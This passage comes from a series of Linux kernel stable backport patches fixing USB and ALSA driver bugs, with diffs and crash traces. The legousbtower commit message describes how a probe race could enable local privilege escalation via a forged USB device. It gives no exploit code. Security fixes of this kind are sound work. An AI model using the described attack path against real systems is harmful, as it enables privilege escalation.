= 2^(7-1) uframes */ j = 16; break; default: /* USB_SPEED_FULL or _LOW */ - /* For low-speed, 10 ms is the official minimum. + /* + * For low-speed, 10 ms is the official minimum. * But some "overclocked" devices might want faster - * polling so we'll allow it. */ - n = 32; + * polling so we'll allow it. + */ + n = 10; break; } } else if (usb_endpoint_xfer_isoc(d)) { @@ -243,10 +249,10 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum, j = 16; switch (to_usb_device(ddev)->speed) { case USB_SPEED_HIGH: - n = 9; /* 32 ms = 2^(9-1) uframes */ + n = 7; /* 8 ms = 2^(7-1) uframes */ break; default: /* USB_SPEED_FULL */ - n = 6; /* 32 ms = 2^(6-1) frames */ + n = 4; /* 8 ms = 2^(4-1) frames */ break; } } From e51960fc4ac954d12a2fffd0f27bc3c2dd5bfd2a Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Fri, 15 Jul 2016 14:15:47 +0300 Subject: [PATCH 117/315] usb: gadget: fsl_qe_udc: signedness bug in qe_get_frame() commit f4693b08cc901912a87369c46537b94ed4084ea0 upstream. We can't assign -EINVAL to a u16. Fixes: 3948f0e0c999 ('usb: add Freescale QE/CPM USB peripheral controller driver') Acked-by: Peter Chen Signed-off-by: Dan Carpenter Signed-off-by: Felipe Balbi Signed-off-by: Willy Tarreau --- drivers/usb/gadget/fsl_qe_udc.c | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/drivers/usb/gadget/fsl_qe_udc.c b/drivers/usb/gadget/fsl_qe_udc.c index 9a7ee3347e4..9fd23300376 100644 --- a/drivers/usb/gadget/fsl_qe_udc.c +++ b/drivers/usb/gadget/fsl_qe_udc.c @@ -1881,11 +1881,8 @@ static int qe_get_frame(struct usb_gadget *gadget) tmp = in_be16(&udc->usb_param->frame_n); if (tmp & 0x8000) - tmp = tmp & 0x07ff; - else - tmp = -EINVAL; - - return (int)tmp; + return tmp & 0x07ff; + return -EINVAL; } static int fsl_qe_start(struct usb_gadget *gadget, From 98e0190b97f01c1a2c6b0a06882e1423218d2b19 Mon Sep 17 00:00:00 2001 From: Konstantin Shkolnyy Date: Wed, 4 May 2016 16:56:52 -0500 Subject: [PATCH 118/315] USB: serial: cp210x: fix hardware flow-control disable commit a377f9e906af4df9071ba8ddba60188cb4013d93 upstream. A bug in the CRTSCTS handling caused RTS to alternate between CRTSCTS=0 => "RTS is transmit active signal" and CRTSCTS=1 => "RTS is used for receive flow control" instead of CRTSCTS=0 => "RTS is statically active" and CRTSCTS=1 => "RTS is used for receive flow control" This only happened after first having enabled CRTSCTS. Signed-off-by: Konstantin Shkolnyy Fixes: 39a66b8d22a3 ("[PATCH] USB: CP2101 Add support for flow control") [johan: reword commit message ] Signed-off-by: Johan Hovold [johan: backport to 4.4 ] Signed-off-by: Johan Hovold Signed-off-by: Willy Tarreau --- drivers/usb/serial/cp210x.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c index 0093261ccc5..d1582d83342 100644 --- a/drivers/usb/serial/cp210x.c +++ b/drivers/usb/serial/cp210x.c @@ -793,7 +793,7 @@ static void cp210x_set_termios(struct tty_struct *tty, } else { modem_ctl[0] &= ~0x7B; modem_ctl[0] |= 0x01; - modem_ctl[1] |= 0x40; + modem_ctl[1] = 0x40; dev_dbg(dev, "%s - flow control = NONE\n", __func__); } From de57bad7f7a9451e6ba5a20dc859f47cac888c8e Mon Sep 17 00:00:00 2001 From: Greg Kroah-Hartman Date: Mon, 19 Sep 2016 19:09:51 +0100 Subject: [PATCH 119/315] usb: misc: legousbtower: Fix NULL pointer deference commit 2fae9e5a7babada041e2e161699ade2447a01989 upstream. This patch fixes a NULL pointer dereference caused by a race codition in the probe function of the legousbtower driver. It re-structures the probe function to only register the interface after successfully reading the board's firmware ID. The probe function does not deregister the usb interface after an error receiving the devices firmware ID. The device file registered (/dev/usb/legousbtower%d) may be read/written globally before the probe function returns. When tower_delete is called in the probe function (after an r/w has been initiated), core dev structures are deleted while the file operation functions are still running. If the 0 address is mappable on the machine, this vulnerability can be used to create a Local Priviege Escalation exploit via a write-what-where condition by remapping dev->interrupt_out_buffer in tower_write. A forged USB device and local program execution would be required for LPE. The USB device would have to delay the control message in tower_probe and accept the control urb in tower_open whilst guest code initiated a write to the device file as tower_delete is called from the error in tower_probe. This bug has existed since 2003. Patch tested by emulated device. Reported-by: James Patrick-Evans Tested-by: James Patrick-Evans Signed-off-by: James Patrick-Evans Signed-off-by: Willy Tarreau --- drivers/usb/misc/legousbtower.c | 35 ++++++++++++++++----------------- 1 file changed, 17 insertions(+), 18 deletions(-) diff --git a/drivers/usb/misc/legousbtower.c b/drivers/usb/misc/legousbtower.c index 80894791c02..c3e9cfc7c27 100644 --- a/drivers/usb/misc/legousbtower.c +++ b/drivers/usb/misc/legousbtower.c @@ -953,24 +953,6 @@ static int tower_probe (struct usb_interface *interface, const struct usb_device dev->interrupt_in_interval = interrupt_in_interval ? interrupt_in_interval : dev->interrupt_in_endpoint->bInterval; dev->interrupt_out_interval = interrupt_out_interval ? interrupt_out_interval : dev->interrupt_out_endpoint->bInterval; - /* we can register the device now, as it is ready */ - usb_set_intfdata (interface, dev); - - retval = usb_register_dev (interface, &tower_class); - - if (retval) { - /* something prevented us from registering this driver */ - dev_err(idev, "Not able to get a minor for this device.\n"); - usb_set_intfdata (interface, NULL); - goto error; - } - dev->minor = interface->minor; - - /* let the user know what node this device is now attached to */ - dev_info(&interface->dev, "LEGO USB Tower #%d now attached to major " - "%d minor %d\n", (dev->minor - LEGO_USB_TOWER_MINOR_BASE), - USB_MAJOR, dev->minor); - /* get the firmware version and log it */ result = usb_control_msg (udev, usb_rcvctrlpipe(udev, 0), @@ -991,6 +973,23 @@ static int tower_probe (struct usb_interface *interface, const struct usb_device get_version_reply.minor, le16_to_cpu(get_version_reply.build_no)); + /* we can register the device now, as it is ready */ + usb_set_intfdata (interface, dev); + + retval = usb_register_dev (interface, &tower_class); + + if (retval) { + /* something prevented us from registering this driver */ + dev_err(idev, "Not able to get a minor for this device.\n"); + usb_set_intfdata (interface, NULL); + goto error; + } + dev->minor = interface->minor; + + /* let the user know what node this device is now attached to */ + dev_info(&interface->dev, "LEGO USB Tower #%d now attached to major " + "%d minor %d\n", (dev->minor - LEGO_USB_TOWER_MINOR_BASE), + USB_MAJOR, dev->minor); exit: dbg(2, "%s: leave, return value 0x%.8lx (dev)", __func__, (long) dev); From 5c82a634f9d298a8c1c50c2fdf2df7aaf06525b8 Mon Sep 17 00:00:00 2001 From: Felipe Balbi Date: Tue, 4 Oct 2016 15:14:43 +0300 Subject: [PATCH 120/315] usb: gadget: function: u_ether: don't starve tx request queue MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 6c83f77278f17a7679001027e9231291c20f0d8a upstream. If we don't guarantee that we will always get an interrupt at least when we're queueing our very last request, we could fall into situation where we queue every request with 'no_interrupt' set. This will cause the link to get stuck. The behavior above has been triggered with g_ether and dwc3. Reported-by: Ville Syrjälä Signed-off-by: Felipe Balbi Signed-off-by: Willy Tarreau --- drivers/usb/gadget/u_ether.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/usb/gadget/u_ether.c b/drivers/usb/gadget/u_ether.c index 4b76124ce96..aad066de515 100644 --- a/drivers/usb/gadget/u_ether.c +++ b/drivers/usb/gadget/u_ether.c @@ -586,8 +586,9 @@ static netdev_tx_t eth_start_xmit(struct sk_buff *skb, /* throttle high/super speed IRQ rate back slightly */ if (gadget_is_dualspeed(dev->gadget)) - req->no_interrupt = (dev->gadget->speed == USB_SPEED_HIGH || - dev->gadget->speed == USB_SPEED_SUPER) + req->no_interrupt = (((dev->gadget->speed == USB_SPEED_HIGH || + dev->gadget->speed == USB_SPEED_SUPER)) && + !list_empty(&dev->tx_reqs)) ? ((atomic_read(&dev->tx_qlen) % qmult) != 0) : 0; From dfa4b7ad66b0e7e511f447f92e0331109c3a0109 Mon Sep 17 00:00:00 2001 From: Johan Hovold Date: Wed, 19 Oct 2016 15:45:07 +0200 Subject: [PATCH 121/315] USB: serial: cp210x: fix tiocmget error handling commit de24e0a108bc48062e1c7acaa97014bce32a919f upstream. The current tiocmget implementation would fail to report errors up the stack and instead leaked a few bits from the stack as a mask of modem-status flags. Fixes: 39a66b8d22a3 ("[PATCH] USB: CP2101 Add support for flow control") Signed-off-by: Johan Hovold Signed-off-by: Willy Tarreau --- drivers/usb/serial/cp210x.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c index d1582d83342..003f8ddbfc3 100644 --- a/drivers/usb/serial/cp210x.c +++ b/drivers/usb/serial/cp210x.c @@ -853,7 +853,9 @@ static int cp210x_tiocmget(struct tty_struct *tty) unsigned int control; int result; - cp210x_get_config(port, CP210X_GET_MDMSTS, &control, 1); + result = cp210x_get_config(port, CP210X_GET_MDMSTS, &control, 1); + if (result) + return result; result = ((control & CONTROL_DTR) ? TIOCM_DTR : 0) |((control & CONTROL_RTS) ? TIOCM_RTS : 0) From 990d13a5e86320906b7a8d427b47e5c92b3165d4 Mon Sep 17 00:00:00 2001 From: Felipe Balbi Date: Tue, 1 Nov 2016 13:20:22 +0200 Subject: [PATCH 122/315] usb: gadget: u_ether: remove interrupt throttling MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit fd9afd3cbe404998d732be6cc798f749597c5114 upstream. According to Dave Miller "the networking stack has a hard requirement that all SKBs which are transmitted must have their completion signalled in a fininte amount of time. This is because, until the SKB is freed by the driver, it holds onto socket, netfilter, and other subsystem resources." In summary, this means that using TX IRQ throttling for the networking gadgets is, at least, complex and we should avoid it for the time being. Reported-by: Ville Syrjälä Tested-by: Ville Syrjälä Suggested-by: David Miller Signed-off-by: Felipe Balbi Signed-off-by: Willy Tarreau --- drivers/usb/gadget/u_ether.c | 8 -------- 1 file changed, 8 deletions(-) diff --git a/drivers/usb/gadget/u_ether.c b/drivers/usb/gadget/u_ether.c index aad066de515..ef5c623cf0d 100644 --- a/drivers/usb/gadget/u_ether.c +++ b/drivers/usb/gadget/u_ether.c @@ -584,14 +584,6 @@ static netdev_tx_t eth_start_xmit(struct sk_buff *skb, req->length = length; - /* throttle high/super speed IRQ rate back slightly */ - if (gadget_is_dualspeed(dev->gadget)) - req->no_interrupt = (((dev->gadget->speed == USB_SPEED_HIGH || - dev->gadget->speed == USB_SPEED_SUPER)) && - !list_empty(&dev->tx_reqs)) - ? ((atomic_read(&dev->tx_qlen) % qmult) != 0) - : 0; - retval = usb_ep_queue(in, req, GFP_ATOMIC); switch (retval) { default: From 82e63143d9a02b971c87223a6a220c77efbbe3e7 Mon Sep 17 00:00:00 2001 From: Peter Chen Date: Tue, 15 Nov 2016 18:05:33 +0800 Subject: [PATCH 123/315] usb: chipidea: move the lock initialization to core file commit a5d906bb261cde5f881a949d3b0fbaa285dcc574 upstream. This can fix below dump when the lock is accessed at host mode due to it is not initialized. [ 46.119638] INFO: trying to register non-static key. [ 46.124643] the code is fine but needs lockdep annotation. [ 46.130144] turning off the locking correctness validator. [ 46.135659] CPU: 0 PID: 690 Comm: cat Not tainted 4.9.0-rc3-00079-g4b75f1d #1210 [ 46.143075] Hardware name: Freescale i.MX6 SoloX (Device Tree) [ 46.148923] Backtrace: [ 46.151448] [] (dump_backtrace) from [] (show_stack+0x18/0x1c) [ 46.159038] r7:edf52000 [ 46.161412] r6:60000193 [ 46.163967] r5:00000000 [ 46.165035] r4:c0e25c2c [ 46.169109] [] (show_stack) from [] (dump_stack+0xb4/0xe8) [ 46.176362] [] (dump_stack) from [] (register_lock_class+0x4fc/0x56c) [ 46.184554] r10:c0e25d24 [ 46.187014] r9:edf53e70 [ 46.189569] r8:c1642444 [ 46.190637] r7:ee9da024 [ 46.193191] r6:00000000 [ 46.194258] r5:00000000 [ 46.196812] r4:00000000 [ 46.199185] r3:00000001 [ 46.203259] [] (register_lock_class) from [] (__lock_acquire+0x80/0x10f0) [ 46.211797] r10:c0e25d24 [ 46.214257] r9:edf53e70 [ 46.216813] r8:ee9da024 [ 46.217880] r7:c1642444 [ 46.220435] r6:edcd1800 [ 46.221502] r5:60000193 [ 46.224057] r4:00000000 [ 46.227953] [] (__lock_acquire) from [] (lock_acquire+0x74/0x94) [ 46.235710] r10:00000001 [ 46.238169] r9:edf53e70 [ 46.240723] r8:edf53f80 [ 46.241790] r7:00000001 [ 46.244344] r6:00000001 [ 46.245412] r5:60000193 [ 46.247966] r4:00000000 [ 46.251866] [] (lock_acquire) from [] (_raw_spin_lock_irqsave+0x40/0x54) [ 46.260319] r7:ee1c6a00 [ 46.262691] r6:c062a570 [ 46.265247] r5:20000113 [ 46.266314] r4:ee9da014 [ 46.270393] [] (_raw_spin_lock_irqsave) from [] (ci_port_test_show+0x2c/0x70) [ 46.279280] r6:eebd2000 [ 46.281652] r5:ee9da010 [ 46.284207] r4:ee9da014 [ 46.286810] [] (ci_port_test_show) from [] (seq_read+0x1ac/0x4f8) [ 46.294655] r9:edf53e70 [ 46.297028] r8:edf53f80 [ 46.299583] r7:ee1c6a00 [ 46.300650] r6:00000001 [ 46.303205] r5:00000000 [ 46.304273] r4:eebd2000 [ 46.306850] [] (seq_read) from [] (full_proxy_read+0x54/0x6c) [ 46.314348] r10:00000000 [ 46.316808] r9:c0a6ad30 [ 46.319363] r8:edf53f80 [ 46.320430] r7:00020000 [ 46.322986] r6:b6de3000 [ 46.324053] r5:ee1c6a00 [ 46.326607] r4:c0248b58 [ 46.330505] [] (full_proxy_read) from [] (__vfs_read+0x34/0x118) [ 46.338262] r9:edf52000 [ 46.340635] r8:c0107fc4 [ 46.343190] r7:00020000 [ 46.344257] r6:edf53f80 [ 46.346812] r5:c039e810 [ 46.347879] r4:ee1c6a00 [ 46.350447] [] (__vfs_read) from [] (vfs_read+0x8c/0x11c) [ 46.357597] r9:edf52000 [ 46.359969] r8:c0107fc4 [ 46.362524] r7:edf53f80 [ 46.363592] r6:b6de3000 [ 46.366147] r5:ee1c6a00 [ 46.367214] r4:00020000 [ 46.369782] [] (vfs_read) from [] (SyS_read+0x4c/0xa8) [ 46.376672] r8:c0107fc4 [ 46.379045] r7:00020000 [ 46.381600] r6:b6de3000 [ 46.382667] r5:ee1c6a00 [ 46.385222] r4:ee1c6a00 [ 46.387817] [] (SyS_read) from [] (ret_fast_syscall+0x0/0x1c) [ 46.395314] r7:00000003 [ 46.397687] r6:b6de3000 [ 46.400243] r5:00020000 [ 46.401310] r4:00020000 Fixes: 26c696c678c4 ("USB: Chipidea: rename struct ci13xxx variables from udc to ci") Signed-off-by: Peter Chen Signed-off-by: Willy Tarreau --- drivers/usb/chipidea/core.c | 1 + drivers/usb/chipidea/udc.c | 2 -- 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c index 475c9c11468..b77badb6889 100644 --- a/drivers/usb/chipidea/core.c +++ b/drivers/usb/chipidea/core.c @@ -381,6 +381,7 @@ static int ci_hdrc_probe(struct platform_device *pdev) return -ENOMEM; } + spin_lock_init(&ci->lock); ci->dev = dev; ci->platdata = dev->platform_data; if (ci->platdata->phy) diff --git a/drivers/usb/chipidea/udc.c b/drivers/usb/chipidea/udc.c index f1cab425163..45c8ffa798b 100644 --- a/drivers/usb/chipidea/udc.c +++ b/drivers/usb/chipidea/udc.c @@ -1647,8 +1647,6 @@ static int udc_start(struct ci13xxx *ci) struct device *dev = ci->dev; int retval = 0; - spin_lock_init(&ci->lock); - ci->gadget.ops = &usb_gadget_ops; ci->gadget.speed = USB_SPEED_UNKNOWN; ci->gadget.max_speed = USB_SPEED_HIGH; From 64c179fa3ca3220b5e2e38aa09bff0b820178b78 Mon Sep 17 00:00:00 2001 From: Petr Vandrovec Date: Thu, 10 Nov 2016 13:57:14 -0800 Subject: [PATCH 124/315] Fix USB CB/CBI storage devices with CONFIG_VMAP_STACK=y commit 2ce9d2272b98743b911196c49e7af5841381c206 upstream. Some code (all error handling) submits CDBs that are allocated on the stack. This breaks with CB/CBI code that tries to create URB directly from SCSI command buffer - which happens to be in vmalloced memory with vmalloced kernel stacks. Let's make copy of the command in usb_stor_CB_transport. Signed-off-by: Petr Vandrovec Acked-by: Alan Stern Signed-off-by: Greg Kroah-Hartman Signed-off-by: Willy Tarreau --- drivers/usb/storage/transport.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/drivers/usb/storage/transport.c b/drivers/usb/storage/transport.c index b1d815eb6d0..8988b268a69 100644 --- a/drivers/usb/storage/transport.c +++ b/drivers/usb/storage/transport.c @@ -919,10 +919,15 @@ int usb_stor_CB_transport(struct scsi_cmnd *srb, struct us_data *us) /* COMMAND STAGE */ /* let's send the command via the control pipe */ + /* + * Command is sometime (f.e. after scsi_eh_prep_cmnd) on the stack. + * Stack may be vmallocated. So no DMA for us. Make a copy. + */ + memcpy(us->iobuf, srb->cmnd, srb->cmd_len); result = usb_stor_ctrl_transfer(us, us->send_ctrl_pipe, US_CBI_ADSC, USB_TYPE_CLASS | USB_RECIP_INTERFACE, 0, - us->ifnum, srb->cmnd, srb->cmd_len); + us->ifnum, us->iobuf, srb->cmd_len); /* check the return code for the command */ usb_stor_dbg(us, "Call to usb_stor_ctrl_transfer() returned %d\n", From c5bbf9a1b01ed89ff79899ad8efd4c337bb8fe3a Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Tue, 30 Aug 2016 14:45:46 +0200 Subject: [PATCH 125/315] ALSA: rawmidi: Fix possible deadlock with virmidi registration commit 816f318b2364262a51024096da7ca3b84e78e3b5 upstream. When a seq-virmidi driver is initialized, it registers a rawmidi instance with its callback to create an associated seq kernel client. Currently it's done throughly in rawmidi's register_mutex context. Recently it was found that this may lead to a deadlock another rawmidi device that is being attached with the sequencer is accessed, as both open with the same register_mutex. This was actually triggered by syzkaller, as Dmitry Vyukov reported: ====================================================== [ INFO: possible circular locking dependency detected ] 4.8.0-rc1+ #11 Not tainted ------------------------------------------------------- syz-executor/7154 is trying to acquire lock: (register_mutex#5){+.+.+.}, at: [] snd_rawmidi_kernel_open+0x4b/0x260 sound/core/rawmidi.c:341 but task is already holding lock: (&grp->list_mutex){++++.+}, at: [] check_and_subscribe_port+0x5b/0x5c0 sound/core/seq/seq_ports.c:495 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #1 (&grp->list_mutex){++++.+}: [] lock_acquire+0x208/0x430 kernel/locking/lockdep.c:3746 [] down_read+0x49/0xc0 kernel/locking/rwsem.c:22 [< inline >] deliver_to_subscribers sound/core/seq/seq_clientmgr.c:681 [] snd_seq_deliver_event+0x35e/0x890 sound/core/seq/seq_clientmgr.c:822 [] > snd_seq_kernel_client_dispatch+0x126/0x170 sound/core/seq/seq_clientmgr.c:2418 [] snd_seq_system_broadcast+0xb2/0xf0 sound/core/seq/seq_system.c:101 [] snd_seq_create_kernel_client+0x24a/0x330 sound/core/seq/seq_clientmgr.c:2297 [< inline >] snd_virmidi_dev_attach_seq sound/core/seq/seq_virmidi.c:383 [] snd_virmidi_dev_register+0x29f/0x750 sound/core/seq/seq_virmidi.c:450 [] snd_rawmidi_dev_register+0x30c/0xd40 sound/core/rawmidi.c:1645 [] __snd_device_register.part.0+0x63/0xc0 sound/core/device.c:164 [< inline >] __snd_device_register sound/core/device.c:162 [] snd_device_register_all+0xad/0x110 sound/core/device.c:212 [] snd_card_register+0xef/0x6c0 sound/core/init.c:749 [] snd_virmidi_probe+0x3ef/0x590 sound/drivers/virmidi.c:123 [] platform_drv_probe+0x8b/0x170 drivers/base/platform.c:564 ...... -> #0 (register_mutex#5){+.+.+.}: [< inline >] check_prev_add kernel/locking/lockdep.c:1829 [< inline >] check_prevs_add kernel/locking/lockdep.c:1939 [< inline >] validate_chain kernel/locking/lockdep.c:2266 [] __lock_acquire+0x4d44/0x4d80 kernel/locking/lockdep.c:3335 [] lock_acquire+0x208/0x430 kernel/locking/lockdep.c:3746 [< inline >] __mutex_lock_common kernel/locking/mutex.c:521 [] mutex_lock_nested+0xb1/0xa20 kernel/locking/mutex.c:621 [] snd_rawmidi_kernel_open+0x4b/0x260 sound/core/rawmidi.c:341 [] midisynth_subscribe+0xf7/0x350 sound/core/seq/seq_midi.c:188 [< inline >] subscribe_port sound/core/seq/seq_ports.c:427 [] check_and_subscribe_port+0x467/0x5c0 sound/core/seq/seq_ports.c:510 [] snd_seq_port_connect+0x2c9/0x500 sound/core/seq/seq_ports.c:579 [] snd_seq_ioctl_subscribe_port+0x1d8/0x2b0 sound/core/seq/seq_clientmgr.c:1480 [] snd_seq_do_ioctl+0x184/0x1e0 sound/core/seq/seq_clientmgr.c:2225 [] snd_seq_kernel_client_ctl+0xa8/0x110 sound/core/seq/seq_clientmgr.c:2440 [] snd_seq_oss_midi_open+0x3b4/0x610 sound/core/seq/oss/seq_oss_midi.c:375 [] snd_seq_oss_synth_setup_midi+0x107/0x4c0 sound/core/seq/oss/seq_oss_synth.c:281 [] snd_seq_oss_open+0x748/0x8d0 sound/core/seq/oss/seq_oss_init.c:274 [] odev_open+0x6a/0x90 sound/core/seq/oss/seq_oss.c:138 [] soundcore_open+0x30f/0x640 sound/sound_core.c:639 ...... other info that might help us debug this: Possible unsafe locking scenario: CPU0 CPU1 ---- ---- lock(&grp->list_mutex); lock(register_mutex#5); lock(&grp->list_mutex); lock(register_mutex#5); *** DEADLOCK *** ====================================================== The fix is to simply move the registration parts in snd_rawmidi_dev_register() to the outside of the register_mutex lock. The lock is needed only to manage the linked list, and it's not necessarily to cover the whole initialization process. Reported-by: Dmitry Vyukov Signed-off-by: Takashi Iwai Signed-off-by: Willy Tarreau --- sound/core/rawmidi.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/sound/core/rawmidi.c b/sound/core/rawmidi.c index 500765f2084..3e9761685c8 100644 --- a/sound/core/rawmidi.c +++ b/sound/core/rawmidi.c @@ -1564,10 +1564,12 @@ static int snd_rawmidi_dev_register(struct snd_device *device) } list_add_tail(&rmidi->list, &snd_rawmidi_devices); sprintf(name, "midiC%iD%i", rmidi->card->number, rmidi->device); + mutex_unlock(®ister_mutex); if ((err = snd_register_device(SNDRV_DEVICE_TYPE_RAWMIDI, rmidi->card, rmidi->device, &snd_rawmidi_f_ops, rmidi, name)) < 0) { snd_printk(KERN_ERR "unable to register rawmidi device %i:%i\n", rmidi->card->number, rmidi->device); + mutex_lock(®ister_mutex); list_del(&rmidi->list); mutex_unlock(®ister_mutex); return err; @@ -1575,6 +1577,7 @@ static int snd_rawmidi_dev_register(struct snd_device *device) if (rmidi->ops && rmidi->ops->dev_register && (err = rmidi->ops->dev_register(rmidi)) < 0) { snd_unregister_device(SNDRV_DEVICE_TYPE_RAWMIDI, rmidi->card, rmidi->device); + mutex_lock(®ister_mutex); list_del(&rmidi->list); mutex_unlock(®ister_mutex); return err; @@ -1603,7 +1606,6 @@ static int snd_rawmidi_dev_register(struct snd_device *device) } } #endif /* CONFIG_SND_OSSEMUL */ - mutex_unlock(®ister_mutex); sprintf(name, "midi%d", rmidi->device); entry = snd_info_create_card_entry(rmidi->card, name, rmidi->card->proc_root); if (entry) { From cd0365e75073414886d0be26260b1dd00de9863c Mon Sep 17 00:00:00 2001 From: Vegard Nossum Date: Sun, 28 Aug 2016 10:13:07 +0200 Subject: [PATCH 126/315] ALSA: timer: fix NULL pointer dereference in read()/ioctl() race commit 11749e086b2766cccf6217a527ef5c5604ba069c upstream. I got this with syzkaller: ================================================================== BUG: KASAN: null-ptr-deref on address 0000000000000020 Read of size 32 by task syz-executor/22519 CPU: 1 PID: 22519 Comm: syz-executor Not tainted 4.8.0-rc2+ #169 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2 014 0000000000000001 ffff880111a17a00 ffffffff81f9f141 ffff880111a17a90 ffff880111a17c50 ffff880114584a58 ffff880114584a10 ffff880111a17a80 ffffffff8161fe3f ffff880100000000 ffff880118d74a48 ffff880118d74a68 Call Trace: [] dump_stack+0x83/0xb2 [] kasan_report_error+0x41f/0x4c0 [] kasan_report+0x34/0x40 [] ? snd_timer_user_read+0x554/0x790 [] check_memory_region+0x13e/0x1a0 [] kasan_check_read+0x11/0x20 [] snd_timer_user_read+0x554/0x790 [] ? snd_timer_user_info_compat.isra.5+0x2b0/0x2b0 [] ? proc_fault_inject_write+0x1c1/0x250 [] ? next_tgid+0x2a0/0x2a0 [] ? do_group_exit+0x108/0x330 [] ? fsnotify+0x72a/0xca0 [] __vfs_read+0x10e/0x550 [] ? snd_timer_user_info_compat.isra.5+0x2b0/0x2b0 [] ? do_sendfile+0xc50/0xc50 [] ? __fsnotify_update_child_dentry_flags+0x60/0x60 [] ? kcov_ioctl+0x56/0x190 [] ? common_file_perm+0x2e2/0x380 [] ? __fsnotify_parent+0x5e/0x2b0 [] ? security_file_permission+0x86/0x1e0 [] ? rw_verify_area+0xe5/0x2b0 [] vfs_read+0x115/0x330 [] SyS_read+0xd1/0x1a0 [] ? vfs_write+0x4b0/0x4b0 [] ? __this_cpu_preempt_check+0x1c/0x20 [] ? __context_tracking_exit.part.4+0x3a/0x1e0 [] ? vfs_write+0x4b0/0x4b0 [] do_syscall_64+0x1c4/0x4e0 [] ? syscall_return_slowpath+0x16c/0x1d0 [] entry_SYSCALL64_slow_path+0x25/0x25 ================================================================== There are a couple of problems that I can see: - ioctl(SNDRV_TIMER_IOCTL_SELECT), which potentially sets tu->queue/tu->tqueue to NULL on memory allocation failure, so read() would get a NULL pointer dereference like the above splat - the same ioctl() can free tu->queue/to->tqueue which means read() could potentially see (and dereference) the freed pointer We can fix both by taking the ioctl_lock mutex when dereferencing ->queue/->tqueue, since that's always held over all the ioctl() code. Just looking at the code I find it likely that there are more problems here such as tu->qhead pointing outside the buffer if the size is changed concurrently using SNDRV_TIMER_IOCTL_PARAMS. [js] unlock in fail paths Signed-off-by: Vegard Nossum Signed-off-by: Takashi Iwai Signed-off-by: Jiri Slaby Signed-off-by: Willy Tarreau --- sound/core/timer.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/sound/core/timer.c b/sound/core/timer.c index 3476895ee1f..f5ddc9bb459 100644 --- a/sound/core/timer.c +++ b/sound/core/timer.c @@ -1922,19 +1922,23 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer, if (err < 0) goto _error; + mutex_lock(&tu->ioctl_lock); if (tu->tread) { if (copy_to_user(buffer, &tu->tqueue[tu->qhead++], sizeof(struct snd_timer_tread))) { + mutex_unlock(&tu->ioctl_lock); err = -EFAULT; goto _error; } } else { if (copy_to_user(buffer, &tu->queue[tu->qhead++], sizeof(struct snd_timer_read))) { + mutex_unlock(&tu->ioctl_lock); err = -EFAULT; goto _error; } } + mutex_unlock(&tu->ioctl_lock); tu->qhead %= tu->queue_size; From 3fcea56cf1b1b39cf76945d29577c9656d568278 Mon Sep 17 00:00:00 2001 From: Vegard Nossum Date: Mon, 29 Aug 2016 00:33:50 +0200 Subject: [PATCH 127/315] ALSA: timer: fix division by zero after SNDRV_TIMER_IOCTL_CONTINUE commit 6b760bb2c63a9e322c0e4a0b5daf335ad93d5a33 upstream. I got this: divide error: 0000 [#1] PREEMPT SMP KASAN CPU: 1 PID: 1327 Comm: a.out Not tainted 4.8.0-rc2+ #189 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014 task: ffff8801120a9580 task.stack: ffff8801120b0000 RIP: 0010:[] [] snd_hrtimer_callback+0x1da/0x3f0 RSP: 0018:ffff88011aa87da8 EFLAGS: 00010006 RAX: 0000000000004f76 RBX: ffff880112655e88 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffff880112655ea0 RDI: 0000000000000001 RBP: ffff88011aa87e00 R08: ffff88013fff905c R09: ffff88013fff9048 R10: ffff88013fff9050 R11: 00000001050a7b8c R12: ffff880114778a00 R13: ffff880114778ab4 R14: ffff880114778b30 R15: 0000000000000000 FS: 00007f071647c700(0000) GS:ffff88011aa80000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000603001 CR3: 0000000112021000 CR4: 00000000000006e0 Stack: 0000000000000000 ffff880114778ab8 ffff880112655ea0 0000000000004f76 ffff880112655ec8 ffff880112655e80 ffff880112655e88 ffff88011aa98fc0 00000000b97ccf2b dffffc0000000000 ffff88011aa98fc0 ffff88011aa87ef0 Call Trace: [] __hrtimer_run_queues+0x347/0xa00 [] ? snd_hrtimer_close+0x130/0x130 [] ? retrigger_next_event+0x1b0/0x1b0 [] ? hrtimer_interrupt+0x136/0x4b0 [] hrtimer_interrupt+0x1b0/0x4b0 [] local_apic_timer_interrupt+0x6e/0xf0 [] ? kvm_guest_apic_eoi_write+0x13/0xc0 [] smp_apic_timer_interrupt+0x76/0xa0 [] apic_timer_interrupt+0x8c/0xa0 [] ? _raw_spin_unlock_irqrestore+0x2c/0x60 [] snd_timer_start1+0xdd/0x670 [] snd_timer_continue+0x45/0x80 [] snd_timer_user_ioctl+0x1030/0x2830 [] ? __follow_pte.isra.49+0x430/0x430 [] ? snd_timer_pause+0x80/0x80 [] ? do_wp_page+0x3aa/0x1c90 [] ? handle_mm_fault+0xbc8/0x27f0 [] ? __pmd_alloc+0x370/0x370 [] ? snd_timer_pause+0x80/0x80 [] do_vfs_ioctl+0x193/0x1050 [] ? 